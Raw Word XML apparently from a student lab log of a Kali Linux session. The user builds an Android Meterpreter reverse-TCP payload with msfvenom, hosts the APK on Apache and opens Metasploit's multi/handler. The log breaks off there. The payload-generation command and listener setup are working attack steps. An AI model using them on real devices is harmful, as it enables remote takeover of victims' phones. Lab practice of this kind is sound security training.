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74037" w14:textId="427D9F01" w:rsidR="00C50AFB" w:rsidRDefault="00920F62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D32CDDE" wp14:editId="06D55DD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AF0B" w14:textId="22AE17A6" w:rsidR="00920F62" w:rsidRDefault="00920F62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09A292E0" wp14:editId="19BA7F3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1286" w14:textId="476A4104" w:rsidR="00920F62" w:rsidRDefault="00920F62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57128118" wp14:editId="5C523DF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0DF8" w14:textId="1F7D9220" w:rsidR="00B313C9" w:rsidRDefault="00B313C9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E2C0D52" wp14:editId="04071A03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3727" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>─(fatima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7A7B87B1" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>└─$ sudo su</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701177CD" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">[sudo] password for fatima: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692DDFE4" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9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1FF327BD" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">└─# ifconfig  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E484571" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459CDA57" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        inet 192.168.88.213  netmask 255.255.255.0  broadcast 192.168.88.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7110BA" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        inet6 fe80::a00:27ff:fe6b:6c33  prefixlen 64  scopeid 0x20&lt;link&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659B703B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        ether 08:00:27:6b:6c:33  txqueuelen 1000  (Ethernet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D7E46" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        RX packets 8188  bytes 1982011 (1.8 MiB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4751FA0D" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        RX errors 65  dropped 0  overruns 0  frame 65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF2AE86" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        TX packets 1403  bytes 271896 (265.5 KiB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E1070" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6976A6" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="7BF98F99" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3006E3DC" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        inet 127.0.0.1  netmask 255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13602B64" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D6535" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        loop  txqueuelen 1000  (Local Loopback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED07FD6" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        RX packets 8  bytes 480 (480.0 B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC52FFF" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        RX errors 0  dropped 0  overruns 0  frame 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF421F" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        TX packets 8  bytes 480 (480.0 B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C287C1A" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082DA6F3" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="5A6A5FEA" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE7138" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9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7F7A49AE" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">└─# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.88.213 LPORT=2222 -o /root/mobilepayload.apk     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11699E56" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEC021E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>[-] No arch selected, selecting arch: dalvik from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4819E734" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C79979" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>Payload size: 10237 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185779CC" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>Saved as: /root/mobilepayload.apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE83B7B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3EDC9C" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:lastRenderedPageBreak/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2CA2417D" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">└─# cp /root/mobilepayload.apk /var/www/html/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B712B4" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7555695D" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9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68B81D27" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">└─# cd /var/www/html                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A43517B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0399E69B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9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kali)-[/var/www/html]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423072CB" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>└─# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B0AF36" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>index.html  index.nginx-debian.html  mobilepayload.apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E7FD0" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA1631" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9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kali)-[/var/www/html]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F24884" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">└─# service apache2 start                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD4CD4F" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D55C57" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9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kali)-[/var/www/html]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24444D33" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>└─# service apache2 status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B525DF7" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>● apache2.service - The Apache HTTP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EBAEA9" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">     Loaded: loaded (/usr/lib/systemd/system/apache2.service; disabled; preset: disabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599872D1" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">     Active: active (running) since Thu 2026-05-14 01:10:24 EDT; 16s ago</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4879AB92" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve"> Invocation: 2c7758c21c034f5ca27e39849291d422</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB7CC3D" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">       Docs: https://httpd.apache.org/docs/2.4/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2335F2" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">    Process: 22702 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD97370" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   Main PID: 22718 (apache2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E402B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">      Tasks: 6 (limit: 6685)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B60791B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">     Memory: 20.4M (peak: 20.5M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F12BF39" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">        CPU: 177ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3ED34F" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">     CGroup: /system.slice/apache2.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3D633B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r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22718 /usr/sbin/apache2 -k start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341486B5" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:lastRenderedPageBreak/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22729 /usr/sbin/apache2 -k start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1280910B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r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22730 /usr/sbin/apache2 -k start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69490AD1" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r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22731 /usr/sbin/apache2 -k start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3230DA21" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r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22732 /usr/sbin/apache2 -k start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172CF48A" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">             └─22733 /usr/sbin/apache2 -k start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AE0FBA" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="5A9E11E2" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>May 14 01:10:24 kali systemd[1]: Starting apache2.service - The Apache HTTP Server...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D20F798" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>May 14 01:10:24 kali systemd[1]: Started apache2.service - The Apache HTTP Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C78305" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA39F3" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9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kali)-[/var/www/html]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8DDEBE" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">└─# msfconsole                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A6F319" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">Metasploit tip: To save all commands executed since start up to a file, use the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C8B1EB" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>makerc command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5E41D0" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270FA04E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                          ########                  #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D859EB7" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                      #################            #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2685CF" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                   ######################         #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E819F0" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                  #########################      #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D37C775" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                ############################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEBA0FB" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">               ##############################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8B8FFB" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">               ###############################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F5F02" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">              ###############################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748CACDC" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">              ##############################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D06BA8" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                              #    ########   #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBEF00F" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                 ##        ###        ####   ##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210C5C19" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                                      ###   ###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7235ED3E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                                    ####   ###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB4C47" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">               ####          ##########   ####</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09F0E0" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">               #######################   ####</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A73E0" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                 ####################   ####</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEC428C" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                  ##################  ####</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C1DD76" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                    ############      ##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559C138" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                       ########        ###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F567AE1" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                      #########        #####</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4D532" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                    ############      ######</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B638F45" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                   ########      #########</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457C1512" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                     #####       ########</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4441268F" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                       ###       #########</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12711FAF" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                      ######    ############</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D926FD" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                     #######################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB9640B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                     #   #   ###  #   #   ##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FD350" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                     ########################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279A6B52" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                      ##     ##   ##     ##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A13F8A9" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">                            https://metasploit.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B375D5D" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="360576D4" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="0AAC65C8" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">       =[ metasploit v6.4.99-dev                                ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C95711" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>+ -- --=[ 2,572 exploits - 1,317 auxiliary - 1,683 payloads     ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511DDD80" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>+ -- --=[ 433 post - 49 encoders - 13 nops - 9 evasion          ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7456E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="54BF3CD7" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>Metasploit Documentation: https://docs.metasploit.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478DE092" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>The Metasploit Framework is a Rapid7 Open Source Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED1110" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="29B46C5A" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>msf &gt; use exlpoit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD94DC" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>[-] No results from search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63347F6E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>[-] Failed to load module: exlpoit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7009920C" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>msf &gt; Interrupt: use the 'exit' command to quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A34D690" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>msf &gt; use exploit multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18182410" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="712C33CE" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>Matching Modules</w:t>
      </w:r>
    </w:p>
